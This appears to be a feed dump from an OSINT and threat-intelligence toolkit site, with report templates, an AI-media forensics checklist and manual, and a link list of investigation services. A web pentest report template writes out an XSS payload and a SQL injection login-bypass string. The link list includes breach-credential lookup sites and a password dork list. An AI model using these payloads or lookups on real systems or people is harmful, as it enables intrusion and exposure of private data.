tema-techint-domain-network ]]>projects/techint/web-history-capture.htmlProjects/techint/web-history-capture.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-asset-investigation.htmlTemplates/reportes-osint/plantilla-asset-investigation.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-breach-analysis.htmlTemplates/reportes-osint/plantilla-breach-analysis.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-communication-patterns.htmlTemplates/reportes-osint/plantilla-communication-patterns.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-domain-website.htmlTemplates/reportes-osint/plantilla-domain-website.mdTue, 28 Apr 2026 14:29:14 GMTspiderfoot-correlations para correlación automatizada
tema-report-writing-cti ]]>templates/reportes-osint/plantilla-domains-and-ip-addresses-investigation-template.htmlTemplates/reportes-osint/plantilla-domains-and-ip-addresses-investigation-template.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-individual-investigation.htmlTemplates/reportes-osint/plantilla-individual-investigation.mdTue, 28 Apr 2026 14:29:14 GMTplantilla-modelo-de-reporting-amenaza-de-hacktivismo-contra-agencia (modelo de reporte complementario)
tema-report-writing-cti ]]>templates/reportes-osint/plantilla-informe-técnico-para-el-equipo-del-soc-tecnico-amenaza-de.htmlTemplates/reportes-osint/plantilla-informe-técnico-para-el-equipo-del-soc-tecnico-amenaza-de.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-modelo-de-reporting-amenaza-de-hacktivismo-contra-agencia.htmlTemplates/reportes-osint/plantilla-modelo-de-reporting-amenaza-de-hacktivismo-contra-agencia.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-network-recon.htmlTemplates/reportes-osint/plantilla-network-recon.mdTue, 28 Apr 2026 14:29:14 GMTplantilla-domains-and-ip-addresses-investigation-template para infraestructura digital del target Datos de práctica disponibles en Datos ficticios para ejercicio OSINT - personas y direcciones de practica
tema-report-writing-cti ]]>templates/reportes-osint/plantilla-personal-information-target-file.htmlTemplates/reportes-osint/plantilla-personal-information-target-file.mdTue, 28 Apr 2026 14:29:14 GMThttps://test.site/search?query= "https://test.site/search?query=%3cscript%3ealert(1)%3c/script%3e") Observar la ejecución inmediata del script. Repetir con distintas cargas XSS para confirmar el impacto. (Figura X: ventana alert mostrada en el navegador). Validar y sanear todas las entradas de usuario. Aplicar escapado de caracteres en la salida HTML. Implementar políticas de Content-Security-Policy restrictivas. Criticidad: Alta CVSS: 8.9 Prioridad: Alta CWE: [Requiere de mas info]El parámetro de contraseña del portal de autenticación permite la inyección de sentencias SQL, posibilitando acceder o modificar datos confidenciales sin autorización:contentReference[oaicite:3]{index=3}.
Navegar a [http://portal.acme.com/login.](http://portal.acme.com/login`. "http://portal.acme.com/login%60.") Introducir un payload del tipo ' OR '1'='1 en el campo password. Observar la respuesta del servidor revelando información interna de la base de datos. (Figura Y: mensaje de error SQL evidenciando la vulnerabilidad). Utilizar consultas parametrizadas o prepared statements. Implementar controles de validación/escape sobre entradas de usuario. Restringir mensajes de error detallados en producción. Se aplica la fórmula Riesgo = Impacto × Probabilidad para determinar la prioridad de remediación. Los valores de impacto y probabilidad se calibran conforme a CVSS v3.1 y al contexto de negocio. Validación de entradas y salidas. Gestión de sesiones y tokens. Configuración de cabeceras HTTP seguras. Uso de cifrado TLS actualizado. Protección frente a inyección y XSS. No se registraron hallazgos de tipo "Info" o el número total fue inferior a 10.
tema-report-writing-cti ]]>templates/reportes-osint/plantilla-de-informe-de-pentesting-web-xss-y-sql-injection.htmlTemplates/reportes-osint/plantilla-de-informe-de-pentesting-web-xss-y-sql-injection.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-informe-cti-osint-data-leak.htmlTemplates/reportes-osint/plantilla-informe-cti-osint-data-leak.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-plantillas-de-prompts-para-reportes-cti-vulnerabilidades-y-n.htmlTemplates/reportes-osint/plantilla-plantillas-de-prompts-para-reportes-cti-vulnerabilidades-y-n.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-resumen-de-inteligencia-amenazas-al-sector-retail-y-ecomme.htmlTemplates/reportes-osint/plantilla-resumen-de-inteligencia-amenazas-al-sector-retail-y-ecomme.mdTue, 28 Apr 2026 14:29:14 GMTplantilla-personal-information-target-file para datos personales, plantilla-domains-and-ip-addresses-investigation-template para infraestructura digital, y otras plantillas de recolección según el tipo de investigación.Servir como punto de entrada y contenedor central para toda la información recopilada sobre un objetivo OSINT. Investigación OSINT activa con objetivo definido Autorización legal para la investigación Crear copia de este archivo con el nombre/identificador del target
Vincular desde plantilla-personal-information-target-file con los datos personales
Vincular desde plantilla-domains-and-ip-addresses-investigation-template si aplica infraestructura digital Agregar secciones adicionales según necesidad de la investigación Mantener actualizado como índice central de hallazgos Archivo creado con identificador único del target Vinculado desde todas las secciones de la investigación Actualizado con últimos hallazgos
plantilla-personal-information-target-file - Template de información personal
plantilla-domains-and-ip-addresses-investigation-template - Template de infraestructura Datos ficticios para ejercicio OSINT - personas y direcciones de practica - Datos de práctica
tema-report-writing-cti ]]>templates/reportes-osint/plantilla-target-file.htmlTemplates/reportes-osint/plantilla-target-file.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>templates/reportes-osint/plantilla-threat-intelligence.htmlTemplates/reportes-osint/plantilla-threat-intelligence.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Fact-checking tools:Verification process:1. Extract metadata with ExifTool 2. Analyze with FotoForensics (ELA) 3. Check consistencies with Forensically 4. For video: use InVID for keyframes 5. Reverse image search in TinEye/Google
tema-deepfakes-ai-forensics ]]>projects/ai-forensics/content-verification.htmlProjects/ai-forensics/content-verification.mdTue, 28 Apr 2026 14:29:12 GMT
A comprehensive and detailed checklist for detecting and analyzing AI-generated or manipulated media — including images, video, audio, and text. It is intended for OSINT investigators, journalists, digital forensic analysts, and security professionals who require structured, reliable verification procedures. Anatomy & Object Integrity Inspect hands: count fingers, check proportions, examine nail shape and placement. Examine eyes: look for mismatched irises, unnatural reflections, symmetry that is “too perfect.” Inspect teeth: check if rendered as a uniform block, misaligned gum lines, or blurry interiors. Inspect ears and earrings: check for asymmetry, distortions, or blending into hair/skin. Check accessories (glasses, hats, jewelry) for warped edges, melting, or blending artifacts. Clothing & Fabrics Look for stitching errors, inconsistent textures, or repeating patterns. Validate logos and printed text on clothing (AI often renders gibberish or blurred letters). Check folds and shadows in fabric for natural consistency. Background Consistency Inspect signage and text in the background for legibility. Identify warped objects (lamp posts, buildings, cars). Check perspective lines: ensure vanishing points are consistent. Lighting & Shadows Ensure all shadows align with a single light source. Validate intensity and direction of light on different objects.
Use SunCalc to validate time of day. Reflections Inspect mirrors, windows, and water surfaces. Ensure reflected objects match reality (orientation, size, color). Technical Checks Run reverse image search on full image and cropped anomalies.
Perform Error Level Analysis (ELA) via Forensically. Inspect for cloning or copy-paste elements.
Review EXIF metadata using ExifTool. Validate GPS and timestamps against claimed context. Frame-by-Frame Analysis Scrub video frame by frame for inconsistencies. Check lips vs. phonemes for sync accuracy. Look for flickering artifacts or blending errors. Motion & Blur Validate natural motion blur; AI often generates sharp unnatural edges during motion. Look for “halo” effects or ghosting in moving objects. Context Checks Verify landmarks, signs, and clothing seasonality.
Cross-check weather with Meteostat or OGIMET.
Use SunCalc for shadow analysis. Technical Tools
Extract thumbnails and keyframes with InVID. Run reverse video searches. Analyze encoding for unusual compression signatures. AI Detection
Run frames through SensityAI or Reality Defender. Apply forensic CNNs like FaceForensics++. Listening Checks Identify robotic cadence, flat intonation, or overly clean delivery. Check for missing human sounds (breathing, mouth clicks, filler words). Detect looping or repetitive background noise. Spectrogram Analysis
Generate spectrograms in Audacity or Praat. Look for: Clean unnatural high frequencies. Banding artifacts. Missing natural harmonics. Environmental Verification Validate background sounds (birds, traffic, wind) against claimed setting. Compare ambient audio with expected acoustics (e.g., indoor echo vs. outdoor open field). Technical Tools Run AI voice detection with Deepware Scanner or Intel FakeCatcher. Compare with known samples of the speaker. Analyze jitter/shimmer metrics in Praat. Linguistic Checks Identify repetitive scaffolding (e.g., “In conclusion, …”). Look for vague or generic phrasing without specifics. Check for fabricated citations, URLs, or ISBNs. Factual Validation Spot-check quotes and references against primary sources. Cross-verify dates, events, and names in OSINT databases. Technical Tools
Run GLTR or DetectGPT. Perform stylometric comparison with JStylo. Use HuggingFace AI detection models for second opinion. Validate location using Google Earth and Street View. Cross-check building architecture with regional styles. Verify vegetation/season (trees in bloom vs. claimed season).
Validate weather data with Meteostat or OGIMET. Check holidays, political events, or known gatherings on claimed date. Match crowd size against known venue capacity. EXIF Analysis
Extract with ExifTool. Look for missing or improbable fields. Detect editing software tags (Stable Diffusion, MidJourney, Photoshop). Compression & Encoding Validate JPEG quantization tables. Compare video codecs against known device profiles. Sensor Noise & PRNU
Run Noiseprint for sensor fingerprinting. Compare with known authentic samples. Provenance Checks Check for C2PA metadata. Validate Adobe Content Credentials. Run Google SynthID watermark checks if available. Share findings with a second analyst for independent validation. Compare across multiple tools and detection methods. Store SHA256 and MD5 hashes of original files for integrity. Maintain chain of custody logs for evidentiary purposes. Document all anomalies with annotated screenshots. Record all commands, queries, and tools used for auditability.
Maintained by Oryon + OSINT360. This document is part of the Cyber Intelligence Toolkit project.
tema-deepfakes-ai-forensics ]]>projects/ai-forensics/checklist-ai-detection.htmlProjects/ai-forensics/checklist-ai-detection.mdTue, 28 Apr 2026 14:29:12 GMT<figure><img src="https://img.shields.io/badge/version-v1.0.0-blue"></figure>

1. Introduction
2. Analysis Models
3. Detection Domains
4. Step-by-Step Procedures
5. Best Practices
6. Analyst Toolkit (2025)
7. Strategic Outlook
Appendix A: Domain → Tools Matrix
Appendix B: Automation Snippets & Field Kit
Credits Artificial Intelligence has enabled the creation of hyper-realistic synthetic media — images, video, audio, and text that can convincingly mimic authentic content. While AI brings innovation in media production, it also introduces risks: misinformation campaigns, reputational attacks, political manipulation, and cyber-enabled fraud.This manual is designed for journalists, investigators, analysts, and digital forensic professionals. It delivers: A structured methodology for content verification. A multi-phase workflow that scales from rapid screening to evidentiary forensics. A toolkit of practical technologies aligned with OSINT and DFIR practices. Best practices for documentation, reporting, and transparency. The detection process is divided into four escalating phases: Rapid Triage (Initial Screening) – Quick suspicion check. Preliminary Verification (Lightweight Checks) – OSINT-based fast validation. Structured Forensic Analysis (In-Depth Review) – Comprehensive forensic-grade methods. Peer Review & Validation (Cross-Check) – Independent replication to reduce bias. How to use this section: Each domain targets a distinct failure mode common to synthetic media. Treat domains as independent lines of evidence. A single red flag rarely proves anything; two or more from different domains justifies escalation.Objective: Detect biological or object construction errors introduced by generative AI.Indicators: Extra, missing, or fused fingers; malformed nails; symmetrical eyes without natural variation. Teeth rendered as uniform blocks or inconsistent with gum lines. Ears, earrings, or glasses distorted or asymmetrical. Clothing, fabric, or accessories with warped stitching, inconsistent patterns, or impossible geometry. Checks: Zoom to 200–400% and scan hands, eyes, and teeth. Look for repeated face patterns in group shots. Compare mirrored body parts for natural asymmetry.
Tools: Forensically, magnifiers, reverse image search on cropped anomalies.Objective: Test whether light, perspective, and reflections obey physical laws.Indicators: Shadows inconsistent with light sources or each other. Reflections missing in mirrors, water, or glass. Vanishing points misaligned; horizon misplaced. Object scale inconsistent with distance. Checks: Use SunCalc to validate shadow length vs. claimed time/place. Draw vanishing lines to test perspective. Inspect reflections for parity and content.
Tools: SunCalc, Google Earth/Street View, Forensically.Objective: Analyze embedded metadata and camera/device signatures.Indicators: Missing EXIF in photos that should contain it. Impossible timestamps or GPS coordinates. Software tags showing AI editors or generators. Uniform synthetic noise lacking natural PRNU (Photo Response Non-Uniformity). Checks: Run ExifTool to review Make/Model, DateTimeOriginal, GPS fields. Inspect compression signatures and quantization tables. Apply Noiseprint for sensor fingerprinting.
Tools: ExifTool, FotoForensics, Noiseprint.Objective: Identify synthetic patterns in speech or environmental sound.Indicators: Robotic cadence; unnatural prosody. Missing breathing, mouth clicks, or ambient noise. Spectrogram anomalies: clean high frequencies, banding. Checks: Inspect spectrograms for unnatural frequency bands. Measure jitter/shimmer in Praat for vocal variation. Compare lip sync to phonemes in video.
Tools: Audacity, Praat, Deepware Scanner, Intel FakeCatcher.Objective: Confirm claimed time, place, and environment.Indicators: Seasonal mismatch (snow vs. claimed summer). Buildings or skylines inconsistent with stated location. Weather contradicting meteorological records. Checks: Validate shadows and lighting with SunCalc. Compare weather with Meteostat or OGIMET logs. Cross-reference landmarks via Google Earth or Street View.
Tools: Meteostat, OGIMET, Google Earth.Objective: Assess realism of group dynamics and human behavior.Indicators: Identical faces or clothing repeated in crowds. People ignoring focal events (all gazes in wrong direction). Uniform expressions or synchronized gestures. Checks: Run face clustering to detect duplicates. Check gaze direction consistency. Observe micro-expressions and natural motion.
Tools: InVID, Forensically.Objective: Detect linguistic artifacts of AI-generated text.Indicators: Repetitive scaffolding or formulaic phrasing. Fabricated citations or unverifiable facts. Uniform sentence lengths and transitions. Checks: Run AI detectors on samples. Perform stylometric comparison to known author texts. Spot-check quotes and references.
Tools: GLTR, DetectGPT, HuggingFace Models, JStylo.Objective: Identify provenance credentials or embedded watermarks.Indicators: Valid C2PA signatures showing edit history. Invisible watermarks indicating AI generation. Checks: Extract provenance JSON and verify signatures. Run SynthID or watermark scanners where available.
Tools: C2PA, Adobe Content Credentials, Google SynthID.Objective: Apply specialized AI detectors trained to spot generative content.Indicators: High detector confidence across multiple frames. Consistent outputs from different models. Checks: Apply forensic CNNs (XceptionNet, FaceForensics++). Compare results across multiple detectors.
Tools: FaceForensics++, DFDC models, XceptionNet-based classifiers.Objective: Ensure all media modalities align with the narrative.Indicators: Lip sync mismatch between audio and video. Weather sounds inconsistent with visual conditions. Narration contradicting imagery. Checks: Align timestamps across text, audio, and video. Verify environment acoustics match visual context. Map camera positions vs. scene constraints.
Tools: CrossCheck, SensityAI, Reality Defender.This section provides an operational, reproducible workflow from first contact with a file/link to an evidence‑grade conclusion. It is organized into four phases. Each phase includes objectives, inputs, actions, tools, outputs, and escalation criteria.Objective: Preserve evidentiary integrity and avoid contaminating artifacts.Inputs: Source URL, file(s), claims (who/what/where/when), stakeholder urgency.Actions: Acquire original if possible (avoid platform‑compressed versions). Request raw files via secure channel. Hash immediately: Bash/macOS: shasum -a 256 <file> PowerShell: Get-FileHash <file> -Algorithm SHA256 Snapshot context: copy URL, post ID, author handle, timestamps (include time zone), and a screenshot of the claim. Workspace: operate on a copy; never re‑encode originals. Record tool names & versions. Risk & scope: decide if this is routine verification or high‑stakes (elections, conflict, criminal case). Output: Case record with IDs, hashes, source notes, and a plan for Phase 1.Objective: Decide in seconds whether the material merits deeper checks.Inputs: One image/video frame, short audio snippet, or text excerpt.Actions (by media type): Image/Video frame: Anatomy & objects: hands, eyes, teeth, ears, accessories, signage, logos. Physics: shadow direction/length, reflections, specular highlights; lighting continuity. “Too perfect” test: cinematic composition, hyper‑clean surfaces, uniform faces. Audio: listen for breath/pauses, monotone prosody, robotic shimmer at pitch changes. Text: repetitive phrasing, encyclopedic tone, confident statements without sources. Common red flags: extra/merged fingers; mismatched shadows; mirrored or unreadable micro‑text; cloned textures; lip‑sync oddities; identical smiles.False positives: heavy denoise/HDR; professional retouching; platform recompression; staged marketing visuals.Output: Triage code — Green (plausible), Amber (suspicious), Red (multiple anomalies). Amber/Red → Phase 2.Objective: Use fast OSINT & basic forensic tools to confirm or challenge authenticity.Inputs: Original (preferred) or best‑quality copy; claimed time/place/context.Tools (typical): Google/Bing/Yandex Images; InVID‑WeVerify; ExifTool; Forensically / FotoForensics; Noiseprint; SunCalc; Timeanddate/Meteostat/OGIMET; Google Earth/Street View.Step‑by‑step: Reverse search (image/video): If video, extract 4–12 keyframes (InVID → Keyframes or ffmpeg -i input.mp4 -vf fps=1 frames/f%04d.jpg). Search the full image plus cropped regions (faces, signs, skyline). Try horizontal flip when relevant. Compare hits: earlier appearances, different captions, stock/AI galleries. Metadata inspection (images/video/audio): exiftool <file> → review Make/Model, Software, DateTimeOriginal, GPS*. Red flags: missing EXIF in camera JPEGs, impossible timestamps, odd Software (generator), GPS contradicting claim. Caveat: social sites often strip/alter EXIF. Basic pixel forensics (images): ELA/Clone/Noise in Forensically/FotoForensics. Red flags: isolated high ELA around inserted objects; tiled repeats; uniform noise where natural variation is expected. Noiseprint/PRNU hint: lack of camera‑like noise structure can support suspicion. Context cross‑check (all media): Place: landmark geometry in Google Earth/Street View; signage language & fonts. Time/lighting: SunCalc — does shadow azimuth/elevation match claimed date/time/location? Weather: compare precipitation/clouds/temperature with Timeanddate/Meteostat/OGIMET. Evidence to capture: screenshots of reverse‑search results; EXIF dumps; ELA/Noise overlays; SunCalc and weather pages (PDFs or images).Decision & escalation: Converging authentic signals → document as provisionally authentic. ≥2 independent inconsistencies → escalate to Phase 3. Objective: Produce a defendable assessment using advanced methods across modalities.Inputs: Highest‑quality media; claims; any prior investigative notes.Modules & procedures:A) Video Forensics Frame extraction: Constant rate: ffmpeg -i in.mp4 -vf fps=5 frames/f_%05d.jpg Scene changes: ffmpeg -i in.mp4 -vf "select='gt(scene,0.5)'" -vsync vfr scenes/s_%05d.jpg Temporal artifacts: look for warping/morphing around faces/hands; inconsistent motion blur; jitter on edges; rolling‑shutter realism during pans. Optical flow/consistency: check for motion coherence of shadows/reflections across frames. B) Audio Forensics Spectrogram analysis (Audacity): View → Spectrogram; inspect harmonics, breath noise, plosives; spot copy‑paste bands. Prosody/phonation (Praat): measure pitch (F0), jitter/shimmer; overly uniform patterns suggest synthesis. Deepfake detectors: run Resemble Detect / Deepware; treat as supporting, not decisive. Physiological cues: where applicable, evaluate biometric pulse cues (e.g., FakeCatcher‑style signals) with caution. C) Text Stylometry Establish a baseline from verified writings (if authorship is at issue). Analyze with JStylo (function words, POS patterns, sentence length variance). Cross‑check with GPTZero/DetectGPT/HuggingFace classifiers; corroborate with factual verification (quotes, sources, dates). D) Contextual OSINT Geolocation: skyline line‑drawing; terrain/river bends; sign typography; street furniture; license plates. Chronology: construction timelines (bridges, towers), event schedules, transport GTFS feeds. Remote sensing: Sentinel Hub/NASA Worldview for cloud cover, snow extent, wildfire smoke on claimed dates. E) Provenance & Watermarking C2PA/Content Credentials: inspect with compatible viewers; export the provenance JSON; verify signatures and edit history. SynthID/Watermarks: where tooling is available, check invisible watermarks in images/audio/text; document limitations. F) Model‑Specific Forensics (AI‑vs‑AI) Apply forensic CNNs (e.g., XceptionNet/FaceForensics++/DFDC models) on images/frames; never as a sole indicator. Record model type, version, thresholds, and confusion risks. G) PRNU / Camera Fingerprinting (expert option) Extract sensor noise residuals; compare to a reference set of images from the purported device. Caveats: recompression, denoise, and resizing degrade PRNU; treat as corroborative. Outputs: Annotated frames/spectrograms; tool outputs (versions, parameters); OSINT corroboration; a reasoned conclusion with probability language (see 4.5). Escalation triggers: conflicting signals; high impact (elections, criminal proceedings); legal request for expert affidavit.Objective: Reduce bias and ensure reproducibility.Process: Prepare a neutral brief (facts, methods, outputs) avoiding leading language. A second analyst replicates key steps (reverse search, EXIF, pixel/audio/text analysis, context checks) independently. Compare findings; document agreements and discrepancies; if needed, seek a third expert or additional data (original file, higher resolution, longer cut). Artifacts: replication log, checklist of reproduced results, change log of conclusions.Outcome: consensus conclusion or documented divergence with rationale.Probability bands (recommendation): Very Low (≤20%) — unlikely AI‑generated. Low (21–40%) — weak indicators; more data recommended. Indeterminate (41–59%) — conflicting signals; seek originals or expert tests. High (60–80%) — multiple independent indicators of AI/manipulation. Very High (>80%) — strong, corroborated evidence across domains. Language examples: “High likelihood of AI generation based on [A, B, C], with no contradicting evidence. Limitations: [X, Y].”Minimum evidence for publication (suggested): ≥2 independent indicators from different domains or 1 strong forensic indicator + context contradiction. Batch EXIF export: exiftool -csv -r -DateTimeOriginal -Make -Model -Software -GPS* <folder> > exif_report.csv Batch keyframes: ffmpeg -i in.mp4 -vf fps=1 out/frame_%05d.jpg Scene change list: ffmpeg -i in.mp4 -filter:v "select='gt(scene,0.4)',showinfo" -f null - 2> scenes.log Tip: Log tool versions and parameters alongside outputs for reproducibility. Case ID, Analyst, Date/Time (TZ), Source URL/ID, Acquisition method, File hashes (SHA‑256), Media type, Claimed context, Tools & versions, Steps performed, Findings per step, Indicators (pro/contra), Probability band, Peer reviewer, Final conclusion, Evidence archive location. Two-signal principle: Never conclude based on one indicator. Documentation: Maintain chain of custody (hashes, metadata, tool versions). Probabilistic reporting: Use “high likelihood” instead of absolutes. Continuous adaptation: Update methods every 6–12 months. Automation: Integrate tools into scripted pipelines. Crowdsourced verification: Collaborate with OSINT/fact-checking communities. Images: Forensically, FotoForensics, ExifTool, Noiseprint. Video: InVID, ffmpeg, FakeCatcher. Audio: Praat, Audacity, Resemble Detect, Deepware Scanner. Text: GPTZero, DetectGPT, JStylo, HuggingFace classifiers. Provenance: C2PA tools, Adobe Content Credentials, SynthID. Context: Google Earth, Sentinel Hub, Meteostat, NASA Worldview. AI-forensics: XceptionNet, FaceForensics++, DFDC models. Evolving AI: Generation models are rapidly improving, masking older flaws. Future of detection: Watermarking, provenance standards, and blockchain-based verification will be critical. Present reality: Only a hybrid approach (intuition + OSINT + forensics + AI detectors + provenance tools) can sustain investigative integrity. Extract metadata (all files in folder to CSV): exiftool -csv -r folder/ > exif_report.csv Strip metadata for sharing (privacy): mat2 file.jpg Extract 1 frame per second: ffmpeg -i video.mp4 -vf fps=1 frames/out_%04d.jpg Extract scene changes: ffmpeg -i video.mp4 -filter:v "select='gt(scene,0.4)',showinfo" -vsync vfr scenes/out_%04d.jpg Get video codec/container info: mediainfo video.mp4 Convert to WAV for spectrograms: ffmpeg -i input.mp4 -vn -acodec pcm_s16le output.wav Generate spectrogram (SoX): sox output.wav -n spectrogram -o spectro.png Detect AI-like text probability (DetectGPT): from detectgpt import DetectGPT model = DetectGPT() score = model.score_text("sample text") print(score) Check perplexity with GPT-2 LM (HuggingFace): from transformers import GPT2LMHeadModel, GPT2TokenizerFast import torch model = GPT2LMHeadModel.from_pretrained("gpt2") tokenizer = GPT2TokenizerFast.from_pretrained("gpt2") text = "sample text" encodings = tokenizer(text, return_tensors="pt") max_length = model.config.n_positions stride = 512 nlls = [] for i in range(0, encodings.input_ids.size(1), stride): begin_loc = max(i + stride - max_length, 0) end_loc = i + stride trg_len = end_loc - i input_ids = encodings.input_ids[:, begin_loc:end_loc] target_ids = input_ids.clone() target_ids[:, :-trg_len] = -100 with torch.no_grad(): outputs = model(input_ids, labels=target_ids) nlls.append(outputs.loss * trg_len) ppl = torch.exp(torch.stack(nlls).sum() / end_loc) print(ppl.item()) WHOIS lookup (Linux): whois example.com Get SSL/TLS certificate info: echo | openssl s_client -connect example.com:443 -servername example.com 2>/dev/null | openssl x509 -noout -dates -issuer -subject Batch hash files in folder: sha256sum * > hashes.txt Create case log template (Markdown): # Case Log - Case ID: - Analyst: - Date/Time (TZ): - Source URL/ID: - File Hashes (SHA-256): - Media Type: - Claimed Context: - Tools & Versions: - Findings: - Indicators: - Probability Band: - Peer Reviewer: - Final Conclusion:
Maintained by Oryon +OSINT360 GPT. This document is part of the Cyber Intelligence Toolkit project.
tema-deepfakes-ai-forensics ]]>projects/ai-forensics/manual-ai-media-forensics.htmlProjects/ai-forensics/manual-ai-media-forensics.mdTue, 28 Apr 2026 14:29:12 GMT<figure><img src="https://img.shields.io/badge/version-v1.0.0-blue"></figure>tema-curso-ceh-completo
tema-malware-cadena-completa ]]>projects/cti/ceh-07-malware-threats.htmlProjects/cti/ceh-07-malware-threats.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/cti/threat-actor-apt28.htmlProjects/cti/threat-actor-apt28.mdTue, 28 Apr 2026 14:29:12 GMThttps://blog.bushidotoken.net/2024/10/cyber-threat-intelligence-for.html
Art Toolkit | https://arttoolkit.github.io/
Cipher387 GitHub | https://github.com/cipher387
Ethical Hacking Tools | https://www.hackerone.com/ethical-hacker/100-hacking-tools-and-resources
Cybersources | https://github.com/brunoooost/cybersources
OSINT Framework | https://osintframework.com/
OSINT4All | https://start.me/p/L1rEYQ/osint4all
GEOINT | https://start.me/p/W1kDAj/geoint
Threat Hunting | https://start.me/p/OmOrJb/threat-hunting
Graph Tips Beta | https://graph.tips/beta/
Who Posted What | https://whopostedwhat.com/
Compare Facebook Friendships | https://www.taringa.net/+hazlo_tu_mismo/ver-amistad-compara-amistades-de-facebook-sin-ser-amigos_12npxb
PeopleFindThor | https://peoplefindthor.dk/
Lookup-ID | https://lookup-id.com/
Twitter Advanced Search | https://twitter.com/search-advanced
Recruitin Twitter Search | https://recruitin.net/twitter.php
Twitonomy | https://www.twitonomy.com/
All My Tweets | https://www.allmytweets.net/connect/
Tinfoleak | https://tinfoleak.com/
SocialBearing | https://socialbearing.com/
Followerwonk Compare | https://followerwonk.com/compare
Foller.me | https://foller.me/
Twiangulate | https://www.twiangulate.com/search/
TweeterID | https://tweeterid.com/
Google Dork List | https://www.boxpiper.com/posts/google-dork-list-files-password
Google Translate | https://translate.google.com/
Google Keep | https://keep.google.com/u/0/
CyberChef | https://gchq.github.io/CyberChef/
Onion Search Engine | https://as.onionsearchengine.com/
Records Finder | https://recordsfinder.com/
API Layer Number Verification | https://apilayer.com/marketplace/number_verification-api?live_demo=show
OnlineSim | https://onlinesim.io/v2/numbers/
Onyphe | https://onyphe.io/
Dehashed | https://dehashed.com/
LeakIX | https://leakix.net/
Pastebin | https://pastebin.com/
Leak Lookup Databases | https://leak-lookup.com/databases
RocketReach | https://rocketreach.co/person
Skymem | https://www.skymem.info/
Hashbin | https://hashb.in/
IntelX | https://intelx.io/account?tab=developer
Snusbase | https://snusbase.com/search
Aleph | https://aleph.occrp.org/notifications
PublicWWW | https://publicwww.com/
OpenCVE | https://www.opencve.io/login
CVE Details | https://www.cvedetails.com/
NVD Vulnerabilities | https://nvd.nist.gov/vuln/search
Zeroday Initiative | https://www.zerodayinitiative.com/portal/bulletins/
HackerTarget | https://hackertarget.com/
EmailRep | https://emailrep.io/
MXToolBox | https://mxtoolbox.com/
Message Header Analyzer | https://toolbox.googleapps.com/apps/messageheader/
Truemail | https://trumail.io/
OMail | https://omail.io/
TrashMail | https://trashmail.com/
Learn DMARC | https://www.learndmarc.com/#
Web Check | https://web-check.as93.net/
URLScan | https://urlscan.io/
AbuseIPDB | https://www.abuseipdb.com/
IPVoid | https://www.ipvoid.com/
SynapsInt | https://synapsint.com/index.php
DNSDumpster | https://dnsdumpster.com/
crt.sh | https://crt.sh/
Domain Dossier | https://centralops.net/co/DomainDossier.aspx
Whoxy | https://www.whoxy.com/
ViewDNS | https://viewdns.info/
AbuseIPDB | https://www.abuseipdb.com/
Awesome IP Search Engines | https://github.com/cipher387/awesome-ip-search-engines?tab=readme-ov-file
Criminal IP | https://www.criminalip.io/
Netify | https://www.netify.ai/resources
Whois Webform | https://whois-webform.markmonitor.com/whois/
Whois DomainTools | https://whois.domaintools.com/
RouteServers | https://www.routeservers.org/
Cisco Crosswork | https://crosswork.cisco.com/#/signup
RIPE Stat | https://stat.ripe.net/app/launchpad
BGP HE.net | https://bgp.he.net/
BGPlay | https://bgplay.massimocandela.com/
PeeringDB | https://www.peeringdb.com/
Shodan | https://www.shodan.io/
Spyse | https://spyse.com/
Wigle | https://wigle.net/
crt.sh | https://crt.sh/
IVRE | https://ivre.rocks/
Vulners | https://vulners.com/
DeTTECT GitHub | https://github.com/rabobank-cdc/DeTTECT?tab=readme-ov-file
DeTTECT Editor | https://rabobank-cdc.github.io/dettect-editor/#/home
DeTTECT Medium Article | https://medium.com/@reotmani/dettect-70db2d219bde
URLHaus | https://urlhaus.abuse.ch/browse/
ThreatFox | https://threatfox.abuse.ch/browse/
IOCFeed | https://iocfeed.mrlooquer.com/
OpenPhish | https://openphish.com/
OTX AlienVault | https://otx.alienvault.com/browse/global/pulses?include_inactive=0&sort=-modified&page=1&limit=10
Phishunt | https://phishunt.io/
Tria.ge | https://tria.ge/s?q=family%3Amirai&offset=2022-07-20T19%3A42%3A03.94094Z&back=true&limit=50&button=
URLHaus Page 0 | https://urlhaus.abuse.ch/browse/page/0/
SSC Threat Intel IoCs | https://github.com/securityscorecard/SSC-Threat-Intel-IoCs
TweetFeed | https://tweetfeed.live/dashboard.html
ThreatMiner | https://www.threatminer.org/index.php
Cybercrime Tracker | https://cybercrime-tracker.net/
URLHaus | https://urlhaus.abuse.ch/
Abuse.ch | https://abuse.ch/
Is It Phishing | https://isitphishing.org/
IsItPhish | https://www.isitphish.com/
GreyNoise | https://www.greynoise.io/
GreyNoise Viz Cheat Sheet | https://www.greynoise.io/viz/cheat-sheet/
Spamhaus Check | https://check.spamhaus.org/
Fortinet PSIRT Blogs | https://www.fortinet.com/blog/psirt-blogs
Cisco Cloud Security | https://sec.cloudapps.cisco.com/security/center/publicationListing.x
Wordfence Threat Intel | https://www.wordfence.com/threat-intel/vulnerabilities/
CVE Details | https://www.cvedetails.com/
Okta Security Articles | https://sec.okta.com/articles
SEKOIA Blog | https://blog.sekoia.io/
Talos Intelligence | https://talosintelligence.com/
Data Breach Today | https://www.databreachtoday.asia/search.php?keywords=qatar#p-1
VulDB | https://vuldb.com/fr/
Snyk Security | https://security.snyk.io/
